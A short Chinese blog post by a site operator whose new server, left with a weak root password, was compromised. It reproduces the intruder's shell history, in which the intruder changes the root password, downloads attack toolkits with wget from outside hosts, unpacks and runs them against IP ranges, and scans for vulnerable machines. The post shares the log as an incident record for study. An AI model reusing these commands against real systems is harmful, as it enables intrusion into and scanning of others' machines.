最近千寻影视用户量增长比较快速,服务器压力接近极限,所以新购置了一台服务器,直接买来就拉到机房安装系统的,因为新装,所以就把root密码很简单的设置了root1234,奇迹就是奇迹,第二天居然就登陆不上去了,这么短的时间内就遭黑客光顾。
这黑客好像也没干什么坏事,现把他留下的痕迹贴在这里,欢迎有兴趣的朋友钻研:
.bash_history内容,他居然没有清掉,这位朋友上来第一件事情居然就是改密码 passwd cd /usr/games ls -a wget www.darkkid.webs.com/arhive/skdet.tgz ; tar zxvf skdet.tgz ; cd skdet ; chmod +x * last -10 ./bleah 187.109.205.69 ./bleah 89.137.248.231 cd .. wget whitehack.do.am/eyes.tgz ; tar zxvf eyes.tgz ;rm -rf eyes.tgz ; cd .eyes ; chmod +x * ; touch bios.txt ls -a last -10 ./a 113.106 ; ./a 114.81 ; ./a 101.81 screen ./screen ping 127.0.0.1 ./screen -r ./screen -r ping 127.0.0.1 w screen -r cd /usr/games ls -a cd .eyes ./screen -r ping 127.0.0.1 w ps x ls -a cd /usr/games ls -a cd .eyes ./screen -r cd .. cd scan ls -a cat vuln.txt ssh -l root 222.93.115.156 nano vuln.txt ls -a rm -rf mfu.txt vuln.txt ps x cd .. ls -a cd .eyes ./screen -r ping 127.0.0.1 ./screen -r ls -a cd .. ls -a cd scan ls -a nano mfu.txt cat vuln.txt cd .. cd .eyes ./screen -r cd .. ls -a cd scan nano mfu.txt cd .. cd .eyes ./screen -r ./screen -r ./screen -r ping 127.0.0.1 ./screen -r ping 127.0.0.1 ./screen -r ping 127.0.0.1 ./screen -r ping 127.0.0.1 ./screen -r ls -a ping 127.0.0.1 ./screen -r ping 127.0.0.1 ./screen -r ls -a rm -rf bios.txt cd .. ls -a cd scan ls -a rm -rf mfu.txt vuln.txt ./go.sh 139 ls -a cat vuln.txt exit cd /usr/games ls -a cd scan ls -a cat vuln.txt w cd .. ls -a cd .eyes ./screen -r w ps x kill -9 23629 ./screen ping 127.0.0.1 ./screen -r ./screen -r 3707.pts-0.localhost ./screen -r 23782.pts-2.localhost ./screen -r ps x ping 127.0.0.1 w ps x cd /usr/games ls -a cd .eyes ./screen -r cd .. cd scan ls -a rm -rf mfu.txt vuln.txt cd .. cd .eyes ./screen -r
从命令中,可以看到,这位朋友下载了两个文件,这两个文件我也附在这里,以防止未来失效
skdet.tgz